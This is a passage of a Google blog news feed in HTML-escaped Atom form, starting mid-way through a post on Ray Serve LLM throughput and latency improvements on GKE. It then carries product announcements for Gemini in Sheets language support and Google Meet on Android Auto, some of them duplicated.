&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;However, that flexibility and feature set used to come at a cost to performance. But today, in partnership with Anyscale, &lt;/span&gt;&lt;a href="https://www.anyscale.com/blog/high-performance-distributed-inference-ray-serve-llm-vllm-google-kubernetes-gke" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;we are delivering up to 5x higher throughput and 8x lower latency in Ray Serve&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, meeting the growing demands and rigorous performance requirements of state-of-the-art distributed inference, without having to sacrifice ease of use.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Scaling inference without the bottlenecks&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Through our joint engineering partnership, we are introducing three major architectural optimizations that dramatically improve Ray Serve LLM's performance characteristics:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Ray Serve HAProxy integration&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Ray Serve now builds in HAProxy to manage internal request routing and load balancing. This setup drastically reduces proxy overhead and prevents the Python runtime from saturating under high traffic.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Direct token streaming architecture&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: This architecture decouples the initial request path from the return stream. Tokens stream directly from individual model replicas back to the proxy, bypassing the ingress router completely for the streaming data path to cut latency.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;v2 Ray executor backend for vLLM&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The revamped Ray backend for vLLM moves Ray out of the data plane to enable asynchronous scheduling. This unifies the code path with native vLLM executors, closing the performance gap and helping to ensure Ray users benefit from the latest engine-level optimizations.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Benchmarking performance on GKE&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We’ve also collaborated with Anyscale to benchmark the updated Ray Serve LLM on GKE clusters utilizing next-generation AI hardware, including Google Cloud A4 VMs powered by &lt;/span&gt;&lt;a href="https://www.nvidia.com/en-us/data-center/hgx/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;NVIDIA HGX B200&lt;/span&gt;&lt;/a&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;systems. We chose to run Gemma 4 E2B as a small, efficient model to isolate bottlenecks introduced from orchestration and routing. Our benchmarks compared the new Ray Serve LLM to its prior performance, as well as a plain vLLM setup using the Ray executor.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These technical enhancements deliver a transformative impact on performance, offering up to &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;5x higher throughput and 8x better latency&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; compared to previous Ray Serve configurations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The improved Ray Serve LLM demonstrated a remarkable improvement on a serving cluster with eight replicas, showing a scaling pattern that far exceeds previous performance, and showing comparable performance to running vLLM natively, but without the flexibility that Ray brings to the table.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_oOeVkik.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We observe that with an increasing number of concurrent users, Ray is now able to scale up throughput while maintaining a low 99th percentile time-to-first-token, where previously it struggled. Now LLM practitioners don’t have to sacrifice Ray’s rich features and ecosystem to get production-grade performance on Kubernetes.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Why choose GKE for Ray Serve&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GKE provides the foundational infrastructure that makes these software optimizations shine. When using the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/add-on/ray-on-gke/concepts/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Ray Operator add-on&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for GKE, you get turnkey deployment across Google Cloud's AI &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/tutorials/serve-llm-tpu-ray"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;accelerators&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, including automated horizontal scaling, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/add-on/ray-on-gke/how-to/collect-view-logs-metrics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;monitoring&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/serve-multi-cluster-ray-inference-gateway"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;multi-cluster scaling&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and built-in fault tolerance. GKE abstracts the complex parts of orchestrating distributed physical hardware, so your team can focus on refining your models and application logic with Ray.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Try Ray Serve LLM on GKE&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We encourage developers to try out these enhancements in the latest Ray release (2.56 and later) and experience the future of high-performance LLM serving on GKE.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For more details, check out the following resources:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://www.anyscale.com/blog/high-performance-distributed-inference-ray-serve-llm-vllm-google-kubernetes-gke" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;New from Anyscale: High Performance Distributed Inference with Ray Serve LLM&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.ray.io/en/master/cluster/kubernetes/user-guides/kuberay-serve-high-throughput.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Enable High Throughput on Ray Serve with KubeRay&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/serve-multi-cluster-ray-inference-gateway"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Serve an LLM with multi-cluster Ray Serve and GKE Inference Gateway&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/tutorials/serve-multi-host-tpu-llm"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Serve Gemma open models on GKE with Ray&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/containers-kubernetes/improving-ray-serve-llm-on-gke-throughput-latency/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-18T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/outreach-and-initiatives/arts-culture/dataland-ai-art-museum/</id>
    <title>Powering the world’s first AI arts museum</title>
    <updated>2026-06-18T15:00:00+00:00</updated>
    <content type="html">AI-generated Infinity Room</content>
    <link href="https://blog.google/company-news/outreach-and-initiatives/arts-culture/dataland-ai-art-museum/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-18T15:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/expanded-language-support-for-gemini-in-sheets.html</id>
    <title>Expanded language support for building and editing spreadsheets with Gemini</title>
    <updated>2026-06-18T14:59:00+00:00</updated>
    <content type="html">Earlier this year, we &lt;a href="https://workspaceupdates.googleblog.com/2026/04/build-and-edit-complex-spreadsheets-with-Gemini-in-Google-Sheets.html" target="_blank"&gt;introduced new Gemini in Sheets capabilities&lt;/a&gt; that allow you to build and edit entire spreadsheets using simple natural language. We’re now expanding support for these features to 28 additional languages, enabling users who speak Spanish, Portuguese, Japanese, Korean, Italian, French, German, Chinese Simplified, Dutch, Hebrew, Polish, Turkish, Czech, Indonesian, Malay, Swedish, Danish, Norwegian, Arabic, Finnish, Vietnamese, Ukrainian, Greek, Thai, Romanian, Russian, Catalan, and Hungarian to collaborate natively with Gemini in their preferred language.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;With this update, users can leverage the full functionality of Gemini to build and edit spreadsheets by issuing prompts in their native language. Whether users are updating budgets, building complex financial models, or conducting data analysis, Gemini leverages Sheets tools—such as tables, pivot tables, charts, and formulas—to execute tasks. This enables global teams to manage data more efficiently, automate workflow execution, and extract valuable cross-document insights without confronting language barriers.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiR-lB2p4tqCkm4M_dUsQVTSdxO_g5Bwr-bTy5AxYynLZLc6ooS81A3EkBpfA11KRiDk2e-aUB7xcdNp3WqeAv5tj9ZEtAoHbDwUPWVF8cY351r72yZi_P8MotEkPShJVBElydlm8wx6TqeH95FQZaf4PTI-YQ18VlcI5ASDl8Z92TCXZNkTdgf7VnqrC1/s1407/Sheets%20Gemini%20i18n.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Gemini in Sheets UX in Spanish language" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiR-lB2p4tqCkm4M_dUsQVTSdxO_g5Bwr-bTy5AxYynLZLc6ooS81A3EkBpfA11KRiDk2e-aUB7xcdNp3WqeAv5tj9ZEtAoHbDwUPWVF8cY351r72yZi_P8MotEkPShJVBElydlm8wx6TqeH95FQZaf4PTI-YQ18VlcI5ASDl8Z92TCXZNkTdgf7VnqrC1/s16000/Sheets%20Gemini%20i18n.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;This feature is available by default if &lt;a href="https://knowledge.workspace.google.com/admin/gemini/manage-access-to-gemini-features-in-workspace-services" target="_blank"&gt;Gemini for Workspace in Sheet&lt;/a&gt;s is enabled. Note that enabling &lt;a href="https://knowledge.workspace.google.com/p/wsi" target="_blank"&gt;Workspace Intelligenc&lt;/a&gt;e expands the range of supported use cases.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;You must have &lt;a href="https://support.google.com/mail/answer/15604322?sjid=17363988672514456782-NA#gw&amp;amp;zippy=%2Csmart-features-in-google-workspace%2Cwhat-are-googles-legal-bases-of-processing-for-users-in-the-european-economic-area-united-kingdom-or-switzerland%2Chow-long-is-your-workspace-content-activity-used-to-provide-smart-features-and-to-improve-these-features" target="_blank"&gt;Workspace smart features&lt;/a&gt; enabled to take advantage of these features. Eligible users will see the Gemini icon in the Sheets side panel. Simply describe the spreadsheet or edit you need to begin collaborating. Visit the Help Center to &lt;a href="https://support.google.com/docs/answer/16959434" target="_blank"&gt;learn more about building and editing spreadsheets with Gemini in Sheets&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="http://knowledge.workspace.google.com/admin/releases/choose-when-users-get-new-features?visit_id=639173870637934581-3789384858&amp;amp;rd=1" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Available now&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer: &lt;/b&gt;Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons:&lt;/b&gt; Google AI Pro for Education&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons:&lt;/b&gt; AI Expanded Access&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Note: Through July 15, 2026, Workspace customers get promotional access to higher limits for the improved Gemini in Sheets experience. Per-user usage limits will apply after July 15; we’ll provide more information in the &lt;a href="https://support.google.com/a?p=limits" target="_blank"&gt;Help Center&lt;/a&gt; in advance of updated usage limits going into effect.&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/16959434" target="_blank"&gt;Build or edit entire spreadsheets with Gemini in Sheets&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Workspace Updates Blog: &lt;a href="https://workspaceupdates.googleblog.com/2026/04/build-and-edit-complex-spreadsheets-with-Gemini-in-Google-Sheets.html" target="_blank"&gt;Build and edit complex spreadsheets with Gemini in Google Sheets&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/expanded-language-support-for-gemini-in-sheets.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-18T14:59:00+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/expanded-language-support-for-gemini-in-sheets.html</id>
    <title>Expanded language support for building and editing spreadsheets with Gemini</title>
    <updated>2026-06-18T14:59:00+00:00</updated>
    <content type="html">Earlier this year, we &lt;a href="https://workspaceupdates.googleblog.com/2026/04/build-and-edit-complex-spreadsheets-with-Gemini-in-Google-Sheets.html" target="_blank"&gt;introduced new Gemini in Sheets capabilities&lt;/a&gt; that allow you to build and edit entire spreadsheets using simple natural language. We’re now expanding support for these features to 28 additional languages, enabling users who speak Spanish, Portuguese, Japanese, Korean, Italian, French, German, Chinese Simplified, Dutch, Hebrew, Polish, Turkish, Czech, Indonesian, Malay, Swedish, Danish, Norwegian, Arabic, Finnish, Vietnamese, Ukrainian, Greek, Thai, Romanian, Russian, Catalan, and Hungarian to collaborate natively with Gemini in their preferred language.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;With this update, users can leverage the full functionality of Gemini to build and edit spreadsheets by issuing prompts in their native language. Whether users are updating budgets, building complex financial models, or conducting data analysis, Gemini leverages Sheets tools—such as tables, pivot tables, charts, and formulas—to execute tasks. This enables global teams to manage data more efficiently, automate workflow execution, and extract valuable cross-document insights without confronting language barriers.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiR-lB2p4tqCkm4M_dUsQVTSdxO_g5Bwr-bTy5AxYynLZLc6ooS81A3EkBpfA11KRiDk2e-aUB7xcdNp3WqeAv5tj9ZEtAoHbDwUPWVF8cY351r72yZi_P8MotEkPShJVBElydlm8wx6TqeH95FQZaf4PTI-YQ18VlcI5ASDl8Z92TCXZNkTdgf7VnqrC1/s1407/Sheets%20Gemini%20i18n.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Gemini in Sheets UX in Spanish language" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiR-lB2p4tqCkm4M_dUsQVTSdxO_g5Bwr-bTy5AxYynLZLc6ooS81A3EkBpfA11KRiDk2e-aUB7xcdNp3WqeAv5tj9ZEtAoHbDwUPWVF8cY351r72yZi_P8MotEkPShJVBElydlm8wx6TqeH95FQZaf4PTI-YQ18VlcI5ASDl8Z92TCXZNkTdgf7VnqrC1/s16000/Sheets%20Gemini%20i18n.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;This feature is available by default if &lt;a href="https://knowledge.workspace.google.com/admin/gemini/manage-access-to-gemini-features-in-workspace-services" target="_blank"&gt;Gemini for Workspace in Sheet&lt;/a&gt;s is enabled. Note that enabling &lt;a href="https://knowledge.workspace.google.com/p/wsi" target="_blank"&gt;Workspace Intelligenc&lt;/a&gt;e expands the range of supported use cases.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;You must have &lt;a href="https://support.google.com/mail/answer/15604322?sjid=17363988672514456782-NA#gw&amp;amp;zippy=%2Csmart-features-in-google-workspace%2Cwhat-are-googles-legal-bases-of-processing-for-users-in-the-european-economic-area-united-kingdom-or-switzerland%2Chow-long-is-your-workspace-content-activity-used-to-provide-smart-features-and-to-improve-these-features" target="_blank"&gt;Workspace smart features&lt;/a&gt; enabled to take advantage of these features. Eligible users will see the Gemini icon in the Sheets side panel. Simply describe the spreadsheet or edit you need to begin collaborating. Visit the Help Center to &lt;a href="https://support.google.com/docs/answer/16959434" target="_blank"&gt;learn more about building and editing spreadsheets with Gemini in Sheets&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="http://knowledge.workspace.google.com/admin/releases/choose-when-users-get-new-features?visit_id=639173870637934581-3789384858&amp;amp;rd=1" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Available now&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer: &lt;/b&gt;Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons:&lt;/b&gt; Google AI Pro for Education&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons:&lt;/b&gt; AI Expanded Access&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Note: Through July 15, 2026, Workspace customers get promotional access to higher limits for the improved Gemini in Sheets experience. Per-user usage limits will apply after July 15; we’ll provide more information in the &lt;a href="https://support.google.com/a?p=limits" target="_blank"&gt;Help Center&lt;/a&gt; in advance of updated usage limits going into effect.&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/16959434" target="_blank"&gt;Build or edit entire spreadsheets with Gemini in Sheets&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Workspace Updates Blog: &lt;a href="https://workspaceupdates.googleblog.com/2026/04/build-and-edit-complex-spreadsheets-with-Gemini-in-Google-Sheets.html" target="_blank"&gt;Build and edit complex spreadsheets with Gemini in Google Sheets&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/expanded-language-support-for-gemini-in-sheets.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-18T14:59:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/google-meet-now-available-on-android.html</id>
    <title>Google Meet now available on Android Auto</title>
    <updated>2026-06-18T14:43:23+00:00</updated>
    <content type="html">We’re bringing the power of Google Meet to your vehicle's display with our new integration for Android Auto. This update makes it easy to safely stay connected and handle important meetings hands-free from behind the wheel.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Users can now access Google Meet directly from their car's dashboard. This integration ensures your productivity doesn't pause when you start your engine. From your vehicle's display, you can check your upcoming meeting schedule and join discussions with a single tap.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDjeD64NYKpEl7DAHRrzb7vZCCQzU0vNoyQdlPNKu5ZPXoS_8Lu4G0A9muZstm7YbdauAmY9UMzxir15tsiD_UKSDKCVGDcyoIEKX4J-ARYceY9-AGUpoYltMEAqn8QXH4lIN38Wo-F43Ah1xWD758Zm8N2drx2h-fHH7LOdKiK2JoQGLxoxDqUghzGQFG/s1919/Android%20Auto%201.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="User interface showing upcoming meetings" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDjeD64NYKpEl7DAHRrzb7vZCCQzU0vNoyQdlPNKu5ZPXoS_8Lu4G0A9muZstm7YbdauAmY9UMzxir15tsiD_UKSDKCVGDcyoIEKX4J-ARYceY9-AGUpoYltMEAqn8QXH4lIN38Wo-F43Ah1xWD758Zm8N2drx2h-fHH7LOdKiK2JoQGLxoxDqUghzGQFG/s16000/Android%20Auto%201.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;You also have the flexibility to make and receive direct audio calls, with a convenient History tab that lets you quickly dial colleagues or clients without taking your eyes off the road.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqwfXW60WqmKu3IURP_qPocQoRxbBlAsvOcbR69nLhyphenhyphenp9GSRZ_ijxxSPl-G8K-kOSjoLSpQc6fwm0t0e2W4muHu-YxjVuk7P7b522AD-9RtUYehdlBfDlUGKK4j26y5HYNUceUuNQhdw_1Ik0MCLe8BjQqD7x-OsK8sFngZYmiC_b5-lU9Nl4yrzqOab0E/s1919/Android%20Auto%202.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="User interface showing recent calls" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqwfXW60WqmKu3IURP_qPocQoRxbBlAsvOcbR69nLhyphenhyphenp9GSRZ_ijxxSPl-G8K-kOSjoLSpQc6fwm0t0e2W4muHu-YxjVuk7P7b522AD-9RtUYehdlBfDlUGKK4j26y5HYNUceUuNQhdw_1Ik0MCLe8BjQqD7x-OsK8sFngZYmiC_b5-lU9Nl4yrzqOab0E/s16000/Android%20Auto%202.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Please note that when you join a meeting or call, your camera is turned off and you won’t see the incoming video content. You’ll hear the audio from the meeting and have audio input access from your microphone.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;This feature is ON by default for users with the Google Meet app installed on their Android phone. To use it, simply connect your phone to an Android Auto-compatible vehicle. Visit the Help Center to &lt;a href="https://support.google.com/meet/answer/16920905" target="_blank"&gt;learn more about using Meet on Android Auto&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release domains&lt;/a&gt;: Available now&lt;/li&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Scheduled Release domains&lt;/a&gt;: Rolling out now, with expected completion by June 26, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers, Workspace Individual subscribers, and users with personal Google accounts&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Meet Help: &lt;a href="https://support.google.com/meet/answer/16920905" target="_blank"&gt;Use Meet on Android Auto&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Updates Blog: &lt;a href="https://workspaceupdates.googleblog.com/2026/04/google-meet-is-now-available-on-carplay.html" target="_blank"&gt;Google Meet is now available on CarPlay&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/google-meet-now-available-on-android.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-18T14:43:23+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/google-meet-now-available-on-android.html</id>
    <title>Google Meet now available on Android Auto</title>
    <updated>2026-06-18T14:43:23+00:00</updated>
    <content type="html">We’re bringing the power of Google Meet to your vehicle's display with our new integration for Android Auto. This update makes it easy to safely stay connected and handle important meetings hands-free from behind the wheel.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Users can now access Google Meet directly from their car's dashboard. This integration ensures your productivity doesn't pause when you start your engine. From your vehicle's display, you can check your upcoming meeting schedule and join discussions with a single tap.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDjeD64NYKpEl7DAHRrzb7vZCCQzU0vNoyQdlPNKu5ZPXoS_8Lu4G0A9muZstm7YbdauAmY9UMzxir15tsiD_UKSDKCVGDcyoIEKX4J-ARYceY9-AGUpoYltMEAqn8QXH4lIN38Wo-F43Ah1xWD758Zm8N2drx2h-fHH7LOdKiK2JoQGLxoxDqUghzGQFG/s1919/Android%20Auto%201.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="User interface showing upcoming meetings" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDjeD64NYKpEl7DAHRrzb7vZCCQzU0vNoyQdlPNKu5ZPXoS_8Lu4G0A9muZstm7YbdauAmY9UMzxir15tsiD_UKSDKCVGDcyoIEKX4J-ARYceY9-AGUpoYltMEAqn8QXH4lIN38Wo-F43Ah1xWD758Zm8N2drx2h-fHH7LOdKiK2JoQGLxoxDqUghzGQFG/s16000/Android%20Auto%201.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;You also have the flexibility to make and receive direct audio calls, with a convenient History tab that lets you quickly dial colleagues or clients without taking your eyes off the road.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 